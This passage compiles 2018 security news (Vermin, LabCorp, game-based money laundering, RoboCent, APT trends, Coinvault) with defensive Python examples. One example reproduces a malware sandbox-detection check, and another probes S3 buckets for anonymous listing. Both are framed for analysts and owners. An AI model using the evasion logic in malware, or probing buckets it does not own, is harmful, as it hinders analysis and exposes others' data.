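_VENDOR_DIR = re.compile(r'(?:appdata\\(?:roaming|local)|%appdata%)\\([^\\"]+)\\', re.IGNORECASE)


def repeat_minutes(value):
    """'0 Hour(s), 10 Minute(s)' -> 10; 'N/A' or anything else -> None."""
    m = _INTERVAL.match(value.strip())
    return int(m.group(1)) * 60 + int(m.group(2)) if m else None


def appdata_vendor_folder(command):
    """Return the vendor-named folder when the first folder below
    AppData\\Roaming (or Local, or %APPDATA%) is one of SUSPECT_PARENTS, else None."""
    m = _VENDOR_DIR.search(command)
    if m and m.group(1).lower() in SUSPECT_PARENTS:
        return m.group(1)
    return None


def hunt_tasks(csv_text, max_minutes=10):
    """Return tasks whose binary lives in a vendor-named AppData folder and which
    repeat at least every `max_minutes` minutes."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        vendor = appdata_vendor_folder(row["Task To Run"])
        every = repeat_minutes(row["Repeat: Every"])
        if vendor and every is not None and every <= max_minutes:
            hits.append({
                "task": row["TaskName"],
                "binary": row["Task To Run"],
                "vendor_folder": vendor,
                "every_min": every,
                "user": row["Run As User"],
            })
    return hits


if __name__ == "__main__":
    for hit in hunt_tasks(SAMPLE_CSV):
        print(f'{hit["task"]}: {hit["binary"]} every {hit["every_min"]} min as {hit["user"]}')
```

The repeat interval is what keeps the false-positive rate down: the OneDrive updater in the sample also lives under an AppData\Microsoft folder, but it has no 10-minute repeat and is not flagged, while the two tasks that match both traits are.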

Since mid-2017, the threat actors adopted steganography to bypass content filtering by hiding the payloads in images that were hosted on the free image hosting websites saveshot.net and ibb.co.

The malicious code runs only on hosts where Russian or Ukrainian keyboard layouts are installed; it also checks the IP address and the username of the target machine.

To evade automated analysis systems, which often rely on tools like Fakenet-NG that make every DNS/HTTP request succeed and return some result, the malware generates a random website name/URL and attempts to connect to it. If the connection fails, the host can be treated as a real system rather than the virtualized environment used by researchers; if a name that should not exist resolves anyway, the sample knows it is being analyzed.
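The check described above, and the sandbox-side answer to it, in Python. This is an added example written for this page rather than Vermin's own code: looks_like_fake_network() resolves hostnames that cannot exist and reports the environment as instrumented when one of them resolves anyway, and selective_resolver() shows how an analysis network can avoid tripping that check by faking only the names you want to observe and returning NXDOMAIN for everything else. The function names and the c2.example.com name are assumptions.

```python
"""Anti-analysis check of the kind described above, plus the sandbox-side fix.

Added example written for this page; it is not Vermin's code. Malware-side logic:
resolve a hostname that cannot exist. On a real network that fails (NXDOMAIN or
no connectivity); in a fake-everything analysis network such as Fakenet-NG it
succeeds, so the sample knows it is being watched and can go quiet.
"""
import secrets
import socket
import string


def random_hostname(length=12, tld="com"):
    """Random label that will not exist in the public DNS."""
    label = "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))
    return f"{label}.{tld}"


def looks_like_fake_network(resolve=socket.gethostbyname, attempts=3):
    """Return True when a hostname that cannot exist still resolves.

    `resolve(name)` must return an address or raise OSError (socket.gaierror is
    a subclass) on failure, like socket.gethostbyname does.
    """
    for _ in range(attempts):
        try:
            resolve(random_hostname())
        except OSError:
            continue        # NXDOMAIN or no network: consistent with a real host
        return True         # a nonexistent name resolved: something answers everything
    return False


def selective_resolver(known):
    """Sandbox-side mitigation: a resolver that answers only the names you chose
    to fake and fails with NXDOMAIN for everything else, so the check above
    behaves exactly as on a real network while the C2 you want to observe still
    resolves. `known` maps hostname -> address."""
    def resolve(name):
        try:
            return known[name.lower().rstrip(".")]
        except KeyError:
            raise socket.gaierror("Name or service not known")
    return resolve


if __name__ == "__main__":
    print("live DNS says fake network:", looks_like_fake_network())
    answer_everything = lambda name: "10.0.0.1"   # Fakenet-NG-style resolution
    print("answer-everything resolver:", looks_like_fake_network(resolve=answer_everything))
    lab = selective_resolver({"c2.example.com": "10.0.0.1"})   # hypothetical C2 name
    print("selective resolver:", looks_like_fake_network(resolve=lab))
```

The practical lesson for the analyst is in selective_resolver(): an analysis network that answers every query is fingerprintable, so configure the fake DNS to answer only the C2 names you expect and to fail everything else.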

“Among the many different malware attacks targeted at high value assets in Ukraine, these attackers haven’t received much public attention – perhaps because of their initial use of open-source-based malware before developing their own strain (Vermin).” concludes the report.

“Employing multiple malware families, as well as various infection mechanisms – including common social engineering techniques but also not-so-common steganography – over the past three years, could be explained by the attackers simply experimenting with various techniques and malware, or it may suggest operations by multiple subgroups.”

Further details on the campaign, including the IoCs are included in the report.

US Biggest Blood Testing Laboratories LabCorp suffered a security breach
19.7.2018 securityaffairs Incident

Hackers have breached the network at LabCorp, one of the largest diagnostic blood testing laboratories in the US, millions of Americans potentially at risk.
The biggest blood testing laboratories network in the US, LabCorp has suffered a security breach. The company announced the incident on Monday, the security breach occurred over the weekend.

The hackers breached the LabCorp Diagnostics systems, but the company says there is no indication that they also compromised the systems used by its drug development business, Covance.

“At this time, there is no evidence of unauthorized transfer or misuse of data. LabCorp has notified the relevant authorities of the suspicious activity and will cooperate in any investigation,” it said, in its statement.

LabCorp did not share further details about the security breach, in response to the incident the company shut down part of its infrastructure.

“LabCorp immediately took certain systems offline as part of its comprehensive response to contain the activity,” the firm said in an 8-K filed with the Securities and Exchange Commission.

“This temporarily affected test processing and customer access to test results over the weekend. Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed today, and we anticipate that additional systems and functions will be restored through the next several days,”

Mike Thomas, a technologist at LabCorp, works with patient samples at the company’s location in Burlington. JULIE KNIGHT – Source www.bizjournals.com

The company says testing operations have substantially resumed; other systems will be fully restored in the coming days, and meanwhile some customers may face brief delays.

“We anticipate that additional systems and functions will be restored throughout the next several days,” it added. “Some customers of LabCorp Diagnostics may experience brief delays in receiving results as we complete that process.”

The hack could have severe consequences for millions of Americans, given the extent of the breached network, which connects thousands of hospitals and testing facilities worldwide.

How crooks conduct Money Laundering operations through mobile games
19.7.2018 securityaffairs Mobile

Experts uncovered a money laundering ring that leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards.
A money laundering ring leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards and then sells these game premiums on online forums and within gaming communities.

The money laundering operation was unveiled by the US Department of Justice; the investigation started in mid-June, when experts from Kromtech Security discovered a MongoDB database exposed online. The database contained information related to carders’ activities, including 150,833 unique card records (card number, expiration date and CVV).

“Following our MongoDB investigations and honey pots deployments from the beginning of this year, we did another round of security audit of unprotected MongoDB instances. In June 2018 we have spotted a strange database publicly exposed to the public internet (no password/login required) along with a large number of credit card numbers and personal information inside.” reads the blog post published by Kromtech Security.

“As we examined the database we rapidly became aware that this was not your ordinary corporate database, this database appeared to belong to credit card thieves (commonly known as carders) and that it was relatively new, only a few months old. So we dug much deeper.”

The activity of the criminal gang behind the operation is as simple as it is effective. The crooks used a special tool to create iOS accounts with valid email accounts, then linked the stolen payment cards to those accounts. Most of the created accounts belong to users located in Saudi Arabia, India, Indonesia, Kuwait, and Mauritania.

The group then jailbroke iOS devices to install various games, created in-game accounts, and used them to purchase game features or premiums.

The cash-out came later, when the crooks re-sold those game features or premiums online for real money.

The cards belonged to 19 different banks; the experts speculated they were bought on carder markets, where such cards are offered in batches of 10k, 20k or 30k.

The list of mobile games used by the cybercriminals includes popular apps such as Clash of Clans and Clash Royale developed by Supercell, and Marvel Contest of Champions developed by Kabam.

The three apps have a gaming community of over 250 million users and generate approximately $330 million USD a year in revenue. The associated third-party markets are very active: websites like g2g.com allow gamers to buy and sell in-game resources and accounts, a great opportunity for crooks involved in money laundering.


“It is interesting to note that these three games are not even in the top five games. Scaling this scheme across other popular apps and games with in-app purchases places the potential market well into the billions of dollars USD per year.” reported Kromtech Security.

App                          Offered by   Android users   Release   Metacritic   In-app products           Daily revenue ($)   Yearly revenue ($)
Clash of Clans               Supercell    100,000,000+    2012      74/100       $0.99 – $99.99 per item   684,002             250M
Clash Royale                 Supercell    100,000,000+    2016      86/100       $0.99 – $99.99 per item   153,150             56M
Marvel Contest of Champions  Kabam        50,000,000+     2014      76/100       $0.99 – $99.99 per item   64,296              23.5M
The experts also found that Apple applies a lax verification process when users add payment card data to an iOS account, which works in the fraudsters' favor: cards with improper names and addresses were approved, so the experts reported the finding to Apple.

The experts also highlighted that the game makers do not implement the measures needed to prevent this kind of abuse. For example, nothing prevents tools like Raccoonbot from interacting with Supercell's games, where they automate the farming and resale of premium items.

“Raccoonbot.com is an automated bot dedicated to Supercell’s Clash of the Clans. It advertises itself in its forum as a way to “Become rich at Clash of the Clans”. This is done by automating the game and selling the gems. It can potentially be used in conjunction with MaxTooliOS to further enhance the profit from the stolen credit cards. It’s a direct violation of Supercell policy, it aids in laundering money, and it also remains in operation.” continues the analysis.

“iGameSupply is an approved marketplace for selling Raccoonbot generated gems https://www.raccoonbot.com/forum/forum/80-approved-marketplace/”

Expert discovered RoboCent AWS S3 bucket containing US voters’ records exposed online
19.7.2018 securityaffairs BigBrothers

A security researcher has discovered that the US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.
The US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.

The researcher Bob Diachenko from Kromtech Security discovered the company's database exposed online. The expert was using the online service GrayhatWarfare, which can be used to search publicly exposed Amazon Web Services S3 storage buckets.

The company sells voter records at 3¢ per record, and it is that same data that was left exposed online.

Querying the service for the term “voters”, he found the AWS bucket used by RoboCent.

The bucket discovered by the expert contained 2,584 files; the exposed voter data includes:

Full Name, suffix, prefix
Phone numbers (cell and landlines)
Address with house, street, city, state, zip, precinct
Political affiliation provided by state, or inferred based on voting trends/history
Age and birth year
Jurisdiction breakdown based on district, zip code, precinct, county, state
Demographics based on ethnicity, language, education
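The condition Diachenko hit (a bucket that answers an anonymous listing request) is easy to test for your own bucket names before someone else does. The Python below is an added example, not the researcher's tooling: it issues the unauthenticated ListObjectsV2 request that S3 serves at https://<bucket>.s3.amazonaws.com/?list-type=2 and summarizes the ListBucketResult it gets back; a 403 means listing is denied, a 404 that no such bucket exists. The sample response, the bucket names and the offline stand-ins for urlopen are constructed so the script also runs without network access.

```python
"""Is this S3 bucket anonymously listable, and what does it expose?

Added example (not the researcher's tool). Standard library only.
"""
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from collections import Counter
from pathlib import PurePosixPath

S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"

# Constructed ListBucketResult, shaped like what S3 returns for an open bucket.
SAMPLE_LISTING = b"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>example-open-bucket</Name>
  <IsTruncated>false</IsTruncated>
  <Contents><Key>voters/county_a.csv</Key><Size>48213</Size></Contents>
  <Contents><Key>voters/county_b.xlsx</Key><Size>120044</Size></Contents>
  <Contents><Key>audio/primary_message.mp3</Key><Size>910221</Size></Contents>
</ListBucketResult>"""


def fetch_listing(bucket, opener=urllib.request.urlopen, timeout=10):
    """Unauthenticated ListObjectsV2. Returns (http_status, body_bytes)."""
    url = f"https://{bucket}.s3.amazonaws.com/?list-type=2"
    try:
        with opener(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:      # 403 = listing denied, 404 = no such bucket
        return err.code, b""


def parse_listing(xml_bytes):
    """Return ([(key, size), ...], is_truncated) from a ListBucketResult document."""
    root = ET.fromstring(xml_bytes)
    keys = [(c.findtext(S3_NS + "Key"), int(c.findtext(S3_NS + "Size") or 0))
            for c in root.iter(S3_NS + "Contents")]
    truncated = (root.findtext(S3_NS + "IsTruncated") or "false").lower() == "true"
    return keys, truncated


def summarize(keys):
    """Object count, total bytes and a per-extension tally: enough to judge what leaked."""
    by_ext = Counter(PurePosixPath(k).suffix.lower() or "(none)" for k, _ in keys)
    return {"objects": len(keys), "bytes": sum(s for _, s in keys), "by_extension": dict(by_ext)}


def check_bucket(bucket, opener=urllib.request.urlopen):
    status, body = fetch_listing(bucket, opener)
    if status != 200:
        return {"bucket": bucket, "listable": False, "status": status}
    keys, truncated = parse_listing(body)
    return {"bucket": bucket, "listable": True, "truncated": truncated, **summarize(keys)}


# Offline stand-ins for urlopen so the check can be exercised without network access.
class _CannedResponse:
    status = 200

    def __init__(self, body):
        self._body = body

    def read(self):
        return self._body

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False


def open_bucket_opener(url, timeout=10):
    return _CannedResponse(SAMPLE_LISTING)


def denied_opener(url, timeout=10):
    raise urllib.error.HTTPError(url, 403, "Forbidden", {}, None)


if __name__ == "__main__":
    print(check_bucket("example-open-bucket", opener=open_bucket_opener))
    print(check_bucket("example-locked-bucket", opener=denied_opener))
    # Live check of a bucket you own (needs network): check_bucket("my-bucket-name")
```

A truncated listing (IsTruncated true) means the first page alone held 1,000 keys; for a real exposure you would page through with the continuation token, but the first page is already enough to decide that the bucket needs Block Public Access turned on.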

The server also contained audio files with prerecorded political messages used for the robo-calling service.

“Just when I thought the days of misconfigured AWS S3 buckets are over, I discovered massive US voter data online, apparently part of Robocent, a Virginia Beach-based political autodial firm’s cloud storage.” wrote Diachenko.

“Many of the files did not originate at Robocent, but are instead the aggregate of outside data firms such as NationalBuilder.”

Diachenko responsibly disclosed the discovery to the company, which quickly secured the bucket. Below is the message sent by the company developer who fixed the issue:

“We’re a small shop (I’m the only developer) so keeping track of everything can be tough”

This is not the first case of an unsecured Amazon S3 bucket exposing voter data: in June 2017 the data firm DRA (Deep Root Analytics) left 1.1 TB of data unsecured on Amazon S3, exposing 198 million US voter records.

In December 2017, Diachenko discovered another exposed MongoDB database, containing voter registration data for more than 19 million California residents.

Okta Acquires Access Control Startup ScaleFT
19.7.2018 securityweek  IT   

Enterprise identity management firm Okta this week announced that it has acquired ScaleFT, a company that offers a Zero Trust access control platform.

Okta provides a Single Sign-On (SSO) solution to help customers efficiently manage user accounts across the enterprise and eliminate passwords while simplifying access. With Multi-factor Authentication (MFA) it provides strong authentication for various services, and it offers over 5,500 pre-built integrations with applications and infrastructure providers.


Founded in 2015, ScaleFT’s access management platform was inspired by Google’s BeyondCorp security model, which provides remote access without the use of a VPN (virtual private network).

With this acquisition, publicly traded Okta (NASDAQ:OKTA), which already helps over 4,700 organizations both secure and manage their extended enterprise, plans to bring Zero Trust to corporations with a framework to protect sensitive data without compromising on experience.

By combining ScaleFT’s Zero Trust platform with its own Identity Cloud, Okta aims to help organizations easily validate users, devices, application and network information while also securing access to data from cloud to ground.

“Companies have realized they can no longer trust their network and have to understand device security — instead of trusting everyone behind a firewall, now IT and security leaders must trust no one, inside or outside the organization,” Frederic Kerrest, Chief Operating Officer and co-founder, Okta, said.

“To help our customers increase security while also meeting the demands of the modern workforce, we’re acquiring ScaleFT to further our contextual access management vision — and ensure the right people get access to the right resources for the shortest amount of time,” Kerrest continued.

The Zero Trust security paradigm requires organizations to move away from the traditional approach of perimeter-based security that included static credentials and access controls, and to focus on adaptive and context-aware controls instead, for making continuous access decisions.

Following the acquisition, ScaleFT CEO and co-founder Jason Luce will manage the transition, while CTO and co-founder Paul Querna will lead strategy and execution of Okta's Zero Trust architecture. Marc Rogers, CSO, will join Okta as Executive Director, Cybersecurity Strategy.

Cisco Finds Serious Flaws in Policy Suite, SD-WAN Products
19.7.2018 securityweek 

Cisco informed customers on Wednesday that it has found and patched over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.

The networking giant reported discovering four critical flaws in Policy Suite during internal testing. Two of these security holes are unauthenticated access issues that allow a remote attacker to access the Policy Builder interface and the Open Services Gateway initiative (OSGi) interface.

Once they gain access to the Policy Builder interface, which is exposed due to a lack of authentication, attackers can make changes to existing repositories and create new repositories. The OSGi interface allows an attacker to access or change any file accessible by the OSGi process.

The lack of an authentication mechanism also exposes the Policy Builder database, allowing an attacker to access and change any data stored in it.

Cisco also discovered that the Cluster Manager in Policy Suite has a root account with default and static credentials. A remote attacker can log in to this account and execute arbitrary commands with root privileges.

These critical Policy Suite vulnerabilities are tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376 and CVE-2018-0377.

Cisco has also fixed a total of seven flaws in its SD-WAN solution. The only one of these vulnerabilities that can be exploited remotely without authentication impacts the Zero Touch Provisioning service and it allows an attacker to cause a denial-of-service (DoS) condition.

The other SD-WAN security holes, which require authentication, can be exploited to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges. One of the SD-WAN bugs requires both authentication and local access for exploitation.

Cisco also informed customers that its Nexus 9000 series Fabric switches, specifically their DHCPv6 feature, are impacted by a high severity flaw that can be exploited by a remote and unauthenticated attacker to cause a DoS condition.

The company has also assigned a high severity rating to multiple vulnerabilities affecting the Cisco Webex Network Recording Player for Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. The security bugs can be exploited for arbitrary code execution by getting the targeted user to open specially crafted ARF or WRF files using the affected player.

None of the vulnerabilities patched this week appear to have been exploited for malicious purposes.

ABB to Patch Code Execution Flaw in HMI Tool
19.7.2018 securityweek 

Swiss industrial tech company ABB is working on a patch for a serious arbitrary code execution vulnerability affecting one of its engineering tools.

The security hole, tracked as CVE-2018-10616, impacts all versions of Panel Builder 800. ABB’s Panel 800 devices provide operator panels for process automation systems, and the Panel Builder is an engineering tool for the process panels included in the product suite. According to ICS-CERT, which published an advisory this week, the tool is used worldwide in the chemical, critical manufacturing, dams, energy, water, and food and agriculture sectors.

Researchers discovered that the HMI tool, specifically its file parser component, is affected by a high severity improper input validation flaw that can allow an attacker to run arbitrary code on the device hosting the affected utility.

A remote attacker can exploit the vulnerability for arbitrary code execution by tricking a local user into opening a specially crafted file. The weakness cannot be exploited without user interaction, ABB pointed out.

The vendor says it’s working on a patch. In the meantime, it has advised customers to ensure that their employees are aware of the threat posed by opening malicious files with the Panel Builder tool, to scan files transferred between devices, and avoid giving users more permissions than required for their job.


ABB says it’s not aware of any malicious exploits targeting this vulnerability and details of the security hole have not been publicly disclosed.

The vulnerability was reported to ABB by Michael DePlante of the Leahy Center for Digital Investigation at Champlain College and Michael Flanders of Trend Micro, both working with the Zero Day Initiative (ZDI).

ZDI lists over 30 upcoming advisories for vulnerabilities discovered by DePlante and Flanders in ABB products, and a majority have been assigned CVSS scores of 9.3, which puts them in the critical severity category. While there are more than 30 advisories, ZDI often publishes a separate advisory for each variation of a flaw, but vendors typically view them as a single issue and only one CVE identifier gets assigned to them.

APT Trends Report Q2 2018
19.7.2018 Kaspersky   APT
In the second quarter of 2017, Kaspersky Lab’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.

These summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity’s sake, we are choosing not to publish indicators associated with the reports highlighted. However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: intelreports@kaspersky.com.

Remarkable new findings
We are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware was for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.

In terms of well-known groups, Asian actors were the most active by far.

Lazarus/BlueNoroff was suspected of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a campaign against an online casino in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks. The US-CERT released a warning in June about a new version of Manuscrypt they call TYPEFRAME.

Even if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.

Possibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft was found using a zero-day exploit, CVE-2018-4878, to target South Korea, a sign that the group’s capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign in which it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero day announced by Qihoo 360. We were later able to confirm the zero day was actually distributed by a different APT group, known as DarkHotel.

The overlaps between Scarcruft and DarkHotel go back to 2016, when we discovered Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero day. We were later able to separate these as follows:

Operation   Exploit         Actor
Daybreak    CVE-2016-4171   DarkHotel
Erebus      CVE-2016-4117   Scarcruft

DarkHotel’s Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero day. Meanwhile, Scarcruft’s Operation Erebus focused primarily on South Korea.

Analysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker was using URLMoniker to invoke Internet Explorer through Microsoft Word, ignoring any default browser preferences on the victim’s computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details check our Securelist Blog: “The King is Dead. Long Live the King!“.

We also observed some relatively quiet groups coming back with new activity. A noteworthy example is LuckyMouse (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.

Still, the most notable activity during this quarter is the VPNFilter campaign attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions. It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an analysis on the EXIF to C2 mechanism used by this malware.

This campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.

Activity of well-known groups
It seems that some of the most active groups from the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last-stage payloads for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.

There is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic games, we observed new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.

But even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy. Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.

One of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since maybe as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.

Newcomers and comebacks
Every now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.

One good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.

Following the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.

We also discovered a new low-sophistication set of activity we call Perfanly, which we couldn’t attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017. It uses custom multistage droppers as well as freely available tools such as Metasploit.

Between June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and PowerShell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.

Final thoughts
The combination of simple custom artefacts designed mainly to evade detection, with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the ‘Chinese-speaking umbrella’, as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.

The intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.

One interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries – some related to new relations with North Korea – held in Mongolia, and to the country’s new role in the region.

There were also several alerts from NCSC and US CERT regarding Energetic Bear/Crouching Yeti activity. Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking our latest analysis on Securelist because the way this actor uses hacked infrastructure can create a lot of collateral victims.

To recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months and VPNFilter should be a wake-up call for those who didn’t believe this was an important issue.

Coinvault, the court case
19.7.2018 Kaspersky Cryptocurrency 
Today, after almost three years of waiting, it was finally the day of the trial. In the Netherlands, where the whole case took place, hearings are open to the public, meaning anyone who is interested can attend. And it was quite busy: besides the suspects, their lawyers, the judges and the prosecutor, there were also several members of the press, a sketch artist (to draw the suspects), several members of the Dutch police, a few victims and other people who were interested in the case.

The defence started by arguing that the public prosecution service was “niet ontvankelijk” (inadmissible) with respect to one of the defendants, meaning it was not allowed to prosecute the case against him. The reason given was that this defendant had been a minor during some of the actions. However, all three judges also hear cases involving underage defendants, and after a quick consultation with each other they decided to continue.

The hearing then resumed with the charges against the two brothers:

Breaking into computers;
Making other people’s work inaccessible;
Extortion of 1295 people.
For us it was quite interesting to understand how they arrived at the number of 1295 people, because when we released our final decryption tool we had at least 14k keys. So most likely many more people were infected. In fact, we think a zero could be added to 1295 to give a more realistic view of the number of victims.

The judge then went on with what was basically a summary of the case: what happened, why they did certain things, etc. We as researchers often guess about the motives behind actions, but we can never be 100% certain until the criminal confesses. One such example is the ransom amount. At the time, the brothers demanded 1 bitcoin as ransom, which was worth about 220 euro. We always say that we believe ransomware criminals choose a relatively small amount to make paying more attractive. When the judge asked the same question, they gave exactly this answer. It is always good to see your theories confirmed 🙂

Some other interesting facts: the case file was too big to fit in a moving box; they made around 20k euro (10k each); they did not stop making ransomware despite the technical challenges; they accepted the risk of a C2 seizure; and they did not really see the effect their actions had on the victims. One of the judges then asked how that was possible, because they ran a helpdesk that victims could e-mail if they had problems. All their “helpdesk” replies were that the victims simply had to pay. The answers they gave the judge were not very convincing.

The suspects did mention that they started the helpdesk because their malware had some implementation mistakes (files were encrypted twice, for example). A consequence of this is that even today, despite the release of our decryption tool, which has all the keys, some victims were not able to recover all of their files. One victim even mentioned that he had simply deleted all of his files because he did not believe a decryption tool would ever become available.

Another thing that we at Kaspersky Lab kept from the public: our initial blog post about Coinvault contained a screenshot with one of the suspects’ first names in the PDB path. When we worked with the police on this case, they kindly asked us to remove that screenshot (which we did), so that the suspects would not realize they had made a mistake. During the court case they mentioned that they had read the blog post, seen the name, and been on the verge of stopping their campaign, but ultimately decided not to.
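The PDB path lesson generalises well beyond this case: a Windows build embeds the debugger symbol path in a CodeView "RSDS" record inside the binary, and that path very often contains the developer's profile directory. The scanner below is an added example, not Kaspersky's tooling and not the Coinvault sample; the bytes in `SAMPLE_BLOB` are constructed for the demo and the profile name `alice` is a placeholder. It locates RSDS records by their magic in raw bytes (so it also works on packed or truncated samples where the PE debug directory cannot be walked) and pulls the user name out of `C:\Users\<name>\...` or `Documents and Settings` paths.

```python
import re
import struct
import uuid

RSDS_MAGIC = b"RSDS"
# Windows profile directories whose next path component names the developer.
USER_DIR = re.compile(r"[A-Za-z]:\\(?:Users|Documents and Settings)\\([^\\]+)\\", re.I)


def extract_pdb_records(data):
    """Scan raw bytes for CodeView RSDS records and return a list of
    (guid, age, pdb_path). Record layout: 'RSDS' | 16-byte GUID (Windows
    little-endian field order) | uint32 age | NUL-terminated path."""
    records = []
    pos = data.find(RSDS_MAGIC)
    while pos != -1:
        start = pos + 4 + 16 + 4            # skip magic, GUID and age
        end = data.find(b"\x00", start)
        if end != -1:
            try:
                path = data[start:end].decode("ascii")
            except UnicodeDecodeError:
                path = None
            # Require a plausible symbol path so random 'RSDS' bytes are ignored.
            if path and path.isprintable() and path.lower().endswith(".pdb"):
                guid = uuid.UUID(bytes_le=data[pos + 4:pos + 20])
                age = struct.unpack_from("<I", data, pos + 20)[0]
                records.append((guid, age, path))
        pos = data.find(RSDS_MAGIC, pos + 1)
    return records


def usernames_from_paths(records):
    """Profile directory names leaked by the PDB paths (deduplicated, in order)."""
    names = []
    for _, _, path in records:
        for m in USER_DIR.finditer(path):
            if m.group(1) not in names:
                names.append(m.group(1))
    return names


# Constructed sample, not a real binary: filler bytes around one RSDS record
# whose path contains a hypothetical developer profile directory.
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_BLOB = (
    b"MZ" + b"\x90" * 30
    + RSDS_MAGIC + SAMPLE_GUID.bytes_le + struct.pack("<I", 1)
    + b"C:\\Users\\alice\\source\\locker\\Release\\locker.pdb\x00"
    + b"\x00" * 16
)

if __name__ == "__main__":
    recs = extract_pdb_records(SAMPLE_BLOB)
    for guid, age, path in recs:
        print(f"{guid} age={age} {path}")
    print("leaked profile names:", usernames_from_paths(recs))
```

Run it over a suspicious sample with `extract_pdb_records(open(path, "rb").read())`; the same check belongs in a release pipeline for your own builds, where a non-empty `usernames_from_paths` result means the symbol path was not scrubbed.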

